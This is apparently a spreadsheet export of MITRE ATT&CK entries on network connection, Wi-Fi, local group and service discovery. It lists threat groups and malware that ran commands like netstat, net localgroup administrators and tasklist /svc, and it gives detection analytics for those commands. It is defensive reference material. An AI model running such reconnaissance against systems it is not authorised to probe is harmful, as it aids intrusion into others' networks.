During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net session`, `net use`, and `netstat` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection.(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) used the &lt;code&gt;net use&lt;/code&gt; command to get a listing on network connections.(Citation: Mandiant APT1)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can enumerate current network connections.(Citation: Symantec Buckeye)(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;netstat -anpo tcp&lt;/code&gt; command to display TCP connections on the victim's machine.(Citation: Cybereason Cobalt Kitty 2017)
APT38
[APT38](https://attack.mitre.org/groups/G0082) installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.(Citation: FireEye APT38 Oct 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has enumerated IP addresses of network resources and used the &lt;code&gt;netstat&lt;/code&gt; command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has used the &lt;code&gt;netstat -naop tcp&lt;/code&gt; command to display TCP connections on a victim's machine.(Citation: Kaspersky Andariel Ransomware June 2021)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used NetCat and PortQry  to enumerate network connections and display the status of related TCP and UDP ports.(Citation: ESET BackdoorDiplomacy Jun 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;netstat -ano | findstr EST&lt;/code&gt; to discover network connections.(Citation: NCC Group Chimera January 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational”
(Event ID 1024) to obtain network information from RDP connections. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used [netstat](https://attack.mitre.org/software/S0104) from a compromised system to obtain network connection information.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used `netstat` and other net  commands for network reconnaissance efforts.(Citation: Mandiant FIN13 Aug 2022)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;netstat -oan&lt;/code&gt; to obtain information about the victim network connections.(Citation: Cybereason Soft Cell June 2019)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used [netstat](https://attack.mitre.org/software/S0104) to monitor connections to specific ports.(Citation: Kaspersky Lyceum October 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs local network connection discovery using &lt;code&gt;netstat&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used &lt;code&gt;net use&lt;/code&gt; to identify and establish a network connection with a remote host.(Citation: Kaspersky ThreatNeedle Feb 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used quser.exe to identify existing RDP connections.(Citation: DFIR Report APT35 ProxyShell March 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used a PowerShell backdoor to check for Skype connections on the target machine.(Citation: Trend Micro Muddy Water March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;netstat -ano&lt;/code&gt; to determine network connection information.(Citation: Avira Mustang Panda January 2020)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;netstat -an&lt;/code&gt; on a victim to get a listing of network connections.(Citation: Palo Alto OilRig May 2016)
Poseidon Group
[Poseidon Group](https://attack.mitre.org/groups/G0033) obtains and saves information about victim network interfaces and addresses.(Citation: Kaspersky Poseidon Group)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018) 
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has run &lt;code&gt;netstat -anp&lt;/code&gt; to search for rival malware connections.(Citation: Trend Micro TeamTNT) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used `libprocesshider` to modify &lt;code&gt;/etc/ld.so.preload&lt;/code&gt;.(Citation: ATT TeamTNT Chimaera September 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.(Citation: SecureWorks BRONZE UNION June 2017)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has tested if the localhost network is available and other connection capability on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the &lt;code&gt;netstat -an&lt;/code&gt;, &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net file&lt;/code&gt;, and &lt;code&gt;net session&lt;/code&gt; commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the &lt;code&gt;GetTcpTable2&lt;/code&gt; API call.(Citation: ESET Turla PowerShell May 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used `netstat -ano` on compromised hosts to enumerate network connections.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)                                                   
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to display network connections: &lt;code&gt;netstat -ano &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used &lt;code&gt;net use&lt;/code&gt; to conduct connectivity checks to machines.(Citation: PWC Cloud Hopper April 2017)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can execute `netstat.exe -f` on a compromised machine.(Citation: BitDefender BADHATCH Mar 2021)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption.(Citation: McAfee Babuk February 2021)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about local network connections using [netstat](https://attack.mitre.org/software/S0104).(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;netstat -r&lt;/code&gt; and &lt;code&gt;netstat -an&lt;/code&gt; commands.(Citation: GovCERT Carbon May 2016)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can use `netsh wlan show profiles` to list specific Wi-Fi profile details.(Citation: Check Point APT35 CharmPower January 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can produce a sessions report from compromised hosts.(Citation: Talos Cobalt Strike September 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) executes the &lt;code&gt;netstat -ano&lt;/code&gt; command.(Citation: Palo Alto Comnie)
Conti
[Conti](https://attack.mitre.org/software/S0575) can enumerate routine network connections from a compromised host.(Citation: CarbonBlack Conti July 2020)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active sessions for a targeted system.(Citation: CME Github September 2018)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can use the function &lt;code&gt;GetIpNetTable&lt;/code&gt; to recover the last connections to the victim's machine.(Citation: McAfee Cuba April 2021) 
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can collect network and active connection information.(Citation: Securelist Dtrack)
Duqu
The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network connections.(Citation: Symantec W32.Duqu)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can enumerate all connected drives.(Citation: NHS Digital Egregor Nov 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can enumerate the current network connections of a host.(Citation: Github PowerShell Empire)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net session&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; commands to gather information on network connections.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute &lt;code&gt;netstat -ano&lt;/code&gt; on a compromised host.(Citation: NTT Security Flagpro new December 2021)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) uses the &lt;code&gt;netstat&lt;/code&gt; command to find open ports on the victim’s machine.(Citation: Talos GravityRAT)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used &lt;code&gt;net session&lt;/code&gt; on the victim's machine.(Citation: Malwarebytes Konni Aug 2021) 
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) can use [netstat](https://attack.mitre.org/software/S0104), [Arp](https://attack.mitre.org/software/S0099), and [Net](https://attack.mitre.org/software/S0039) to discover current TCP connections.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of active and listening connections by using the command &lt;code&gt;netstat -nao&lt;/code&gt; as well as a list of available network mappings with &lt;code&gt;net use&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has a plugin to retrieve information about all active network sessions on the infected server.(Citation: BiZone Lizar May 2021)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can identify the IP and port numbers for all remote connections from the compromised host.(Citation: Unit 42 Lucifer June 2020)
MESSAGETAP
After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)
Machete
[Machete](https://attack.mitre.org/software/S0409) uses the &lt;code&gt;netsh wlan show networks mode=bssid&lt;/code&gt; and &lt;code&gt;netsh wlan show interfaces&lt;/code&gt; commands to list all nearby WiFi networks and connected interfaces.(Citation: ESET Machete July 2019) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can use the &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; function to retrieve information about established TCP connections.(Citation: SentinelLabs Metador Sept 2022)
Maze
[Maze](https://attack.mitre.org/software/S0449) has used the "WNetOpenEnumW", "WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can capture session logon details from a compromised host.(Citation: FireEye NETWIRE March 2019)
Net
Commands such as &lt;code&gt;net use&lt;/code&gt; and &lt;code&gt;net session&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about network connections from a particular host.(Citation: Savill 1999)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) enumerates the current network connections similar to &lt;code&gt; net use &lt;/code&gt;.(Citation: Symantec Buckeye)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may collect active network connections by running &lt;code&gt;netstat -an&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)
Pacu
Once inside a Virtual Private Cloud, [Pacu](https://attack.mitre.org/software/S1091) can attempt to identify DirectConnect, VPN, or VPC Peering.(Citation: GitHub Pacu)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has a module for enumerating TCP and UDP network connections and associated processes using the &lt;code&gt;netstat&lt;/code&gt; command.(Citation: CIRCL PlugX March 2013)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [netstat](https://attack.mitre.org/software/S0104) to enumerate TCP and UDP connections.(Citation: GitHub PoshC2)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) has a built-in utility command for &lt;code&gt;netstat&lt;/code&gt;, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.(Citation: GitHub Pupy)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032) has used [netsh](https://attack.mitre.org/software/S0108) to find RPC connections on remote machines.(Citation: Checkpoint MosesStaff Nov 2021)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate current network connections.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;netstat -ano&lt;/code&gt; to search for specific IP address ranges.(Citation: RATANKBA)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate network connections.(Citation: Antiy CERT Ramsay April 2020)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate drives and Remote Desktop sessions.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of active connections and open ports.(Citation: Kaspersky ProjectSauron Technical Analysis)
SHOTPUT
[SHOTPUT](https://attack.mitre.org/software/S0063) uses [netstat](https://attack.mitre.org/software/S0104) to list TCP connection status.(Citation: Palo Alto CVE-2015-3113 July 2015)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate open ports on a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `netstat` command.(Citation: Bitdefender Sardonic Aug 2021)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function &lt;code&gt;GetExtendedUdpTable&lt;/code&gt; to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has retrieved a GUID associated with a present LAN connection on a compromised machine.(Citation: MSTIC NOBELIUM Mar 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can collect network connection information.(Citation: GitHub Sliver Netstat)
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;arp -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;netstat -ano&lt;/code&gt; to display active network connections.(Citation: AlienVault Sykipot 2011)
Torisma
[Torisma](https://attack.mitre.org/software/S0678) can use `WTSEnumerateSessionsW` to monitor remote desktop connections.(Citation: McAfee Lazarus Nov 2020)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [netstat](https://attack.mitre.org/software/S0104) to collect a list of network connections.(Citation: Secureworks Karagany July 2019)
USBferry
[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;nbtstat&lt;/code&gt; to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)	
Volgmer
[Volgmer](https://attack.mitre.org/software/S0180) can gather information about TCP connection state.(Citation: Symantec Volgmer Aug 2014)
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.(Citation: Trend Micro Waterbear December 2019) 
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) uses &lt;code&gt;netstat -aon&lt;/code&gt; to gather network connection information.(Citation: ESET Zebrocy May 2019)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can list network connections.(Citation: Kaspersky Adwind Feb 2016)
nbtstat
[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover current NetBIOS sessions.
netstat
[netstat](https://attack.mitre.org/software/S0104) can be used to enumerate local network connections, including active TCP connections and other network statistics.(Citation: TechNet Netstat)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may collect Wi-Fi information on compromised systems.
OS API Execution
Monitor for API calls (such as those from `wlanAPI.dll`) that may gather details about locally reachable Wi-Fi networks.
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has collected names and passwords of all Wi-Fi networks to which a device has previously connected.(Citation: Check Point APT35 CharmPower January 2022)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can collect names and passwords of all Wi-Fi networks to which a device has previously connected.(Citation: Malwarebytes Agent Tesla April 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) can extract names of all locally reachable Wi-Fi networks and then perform a brute-force attack to spread to new networks.(Citation: Binary Defense Emotes Wi-Fi Spreader)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for executed commands and arguments that may attempt to find local system groups and permission settings.
Group Enumeration
Monitor for logging that may suggest a list of available groups and/or their associated settings has been extracted, ex. Windows EID 4798 and 4799.
OS API Execution
Monitor for API calls associated with finding local system groups and permission settings, such as NetLocalGroupEnum. Other API calls relevant to Local Group discovery include NetQueryDisplayInformation and NetGetDisplayInformationIndex.
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary. 
Process Creation
Monitor newly executed processes that may attempt to find local system groups and permission settings.
Note: Event IDs are for Sysmon (Event ID 1 - process creation) and Windows Security Log (Event ID 4688 - a new process has been created). The logic in the Analytic looks for any instances of net.exe used for local user/group discovery; although this utility is not normally used for benign purposes, such usage by system administrator actions may trigger false positives.
&lt;h4&gt; Analytic 1 - Suspicious Processes &lt;/h4&gt;
&lt;code&gt;processes = filter processes where (
 (event_id == "1" OR event_id == "4688") AND
  exe = "net.exe" AND (
  command_line="*net* user*" OR
  command_line="*net* group*" OR
  command_line="*net* localgroup*" OR
  command_line="*get-localgroup*" OR
  command_line="*get-ADPrincipalGroupMembership*" )&lt;/code&gt;
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.(Citation: DFIR Conti Bazar Nov 2021)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net group` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the command `net localgroup administrators` to list all administrators part of a local group.(Citation: FoxIT Wocao December 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net localgroup administrators&lt;/code&gt; to identify  accounts with local administrative rights.(Citation: NCC Group Chimera January 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has run `net localgroup` to enumerate local groups.(Citation: Kaspersky Lyceum October 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;net localgroup administrators&lt;/code&gt; to find local administrators on compromised systems.(Citation: Palo Alto OilRig May 2016)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used the &lt;code&gt;ShowLocalGroupDetails&lt;/code&gt; command to identify administrator, user, and guest accounts on a compromised host.(Citation: TrendMicro Tonto Team October 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net localgroup&lt;/code&gt; and &lt;code&gt;net localgroup Administrators&lt;/code&gt; to enumerate group information, including members of the local administrators group.(Citation: ESET ComRAT May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `net localgroup administrators` in compromised environments to enumerate accounts.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to list local groups: &lt;code&gt;net localgroup administrator &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can collect information about local groups and members.(Citation: CrowdStrike BloodHound April 2018)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of local groups of users from a system.(Citation: ClearSky Lebanese Cedar Jan 2021)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;net localgroup&lt;/code&gt; to list local groups on a system.(Citation: Cobalt Strike Manual 4.3 November 2020)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Emissary Trojan Feb 2016)
Epic
[Epic](https://attack.mitre.org/software/S0091) gathers information on local group names.(Citation: Kaspersky Turla Aug 2014)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute the &lt;code&gt;net localgroup administrators&lt;/code&gt; command on a targeted system.(Citation: NTT Security Flagpro new December 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the privilege level of the victim during the initial infection.(Citation: Proofpoint TA505 Mar 2018)(Citation: Korean FSI TA505 2020)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) has checked the local administrators group.(Citation: Unit 42 Playbook Dec 2017)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can obtain the permissions of the victim user.(Citation: Microsoft PLATINUM April 2016)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) gathers information about local groups and members.(Citation: Unit 42 Kazuar May 2017)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of users belonging to the local users and administrators groups with the commands &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net localgroup users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
Net
Commands such as &lt;code&gt;net group&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) has enumerated the local administrators group.(Citation: Symantec Buckeye)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may collect local group information by running &lt;code&gt;net localgroup administrators&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-LocAdm&lt;/code&gt; for enumerating permission groups.(Citation: GitHub PoshC2)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net localgroup&lt;/code&gt; to enable discovery of local groups.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can obtain a list of local groups and members.(Citation: GitHub SILENTTRINITY Modules July 2019)
Sys10
[Sys10](https://attack.mitre.org/software/S0060) collects the group name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that could be taken to gather system information related to services.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OS API Execution
Monitor for API calls associated with gathering information about registered local system services, such as QueryServiceStatusEx. Other Windows API calls worth monitoring include EnumServicesStatusExA, which can be used to enumerate services in the service control manager database.
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary.
Process Creation
Monitor for newly executed processes with arguments that may try to get information about registered services. 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Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). For event id 4688, depending on Windows version, you might need to enable &lt;code&gt; Administrative Templates\System\Audit Process Creation\Include command line in process creation events &lt;/code&gt; group policy to include command line in process creation events.
&lt;h4&gt; Analytic 1 -  Suspicious Processes &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter processes where (event_id == "1" OR event_id == "4688") AND
  ((command_line LIKE '%sc%' AND command_line LIKE '%query%') OR 
   (command_line LIKE '%tasklist%' AND command_line LIKE '%/svc%') OR
   (command_line LIKE '%systemctl%' AND command_line LIKE '%--type=service%') OR
   (command_line LIKE '%net%' AND command_line LIKE '%start%')) &lt;/code&gt;
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net start` command as part of their initial reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `tasklist` command to search for one of its backdoors.(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) used the commands &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;tasklist&lt;/code&gt; to get a listing of the services on the system.(Citation: Mandiant APT1)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to discover services for third party EDR products.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used TROJ_GETVERSION to discover system services.(Citation: Trend Micro Tick November 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net use&lt;/code&gt; for system service discovery.(Citation: NCC Group Chimera January 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used the win32_service WMI class to retrieve a list of services from the system.(Citation: Symantec WastedLocker June 2020) 
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs service discovery using &lt;code&gt;net start&lt;/code&gt; commands.(Citation: Mandiant Operation Ke3chang November 2014)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used an instrumentor script to gather the names of all services running on a victim's system.(Citation: Talos Kimsuky Nov 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;sc query&lt;/code&gt; on a victim to gather information about services.(Citation: Palo Alto OilRig May 2016)
Poseidon Group
After compromising a victim, [Poseidon Group](https://attack.mitre.org/groups/G0033) discovers all running services.(Citation: Kaspersky Poseidon Group)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.(Citation: Cisco Talos Intelligence Group)
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running services and associated processes using the &lt;code&gt;tasklist /svc&lt;/code&gt; command.(Citation: Kaspersky Turla)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to obtain information about services: &lt;code&gt;net start &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can query service configuration information.(Citation: Palo Alto Networks BBSRAT)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can enumerate all services running on a compromised host.(Citation: McAfee Babuk February 2021)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate existing Windows services on the host that are configured to run as LocalSystem.(Citation: Crowdstrike Indrik November 2018)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can check whether the service name FAX is present.(Citation: Cyble Black Basta May 2022)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of the services from a system.(Citation: ClearSky Lebanese Cedar Jan 2021) 
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can enumerate services on compromised hosts.(Citation: Cobalt Strike Manual 4.3 November 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) runs the command: &lt;code&gt;net start &gt;&gt; %TEMP%\info.dat&lt;/code&gt; on a victim.(Citation: Palo Alto Comnie)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can query service status using &lt;code&gt;QueryServiceStatusEx&lt;/code&gt; function.(Citation: McAfee Cuba April 2021)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can retrieve information about a compromised system's running services.(Citation: Secureworks DarkTortilla Aug 2022)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)
Elise
[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net start&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) has the capability to execute the command &lt;code&gt;net start&lt;/code&gt; to interact with services.(Citation: Emissary Trojan Feb 2016)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /svc&lt;/code&gt; command to list the services on the system.(Citation: Kaspersky Turla)
GeminiDuke
[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on programs and services on the victim that are configured to automatically run at startup.(Citation: F-Secure The Dukes)
GravityRAT
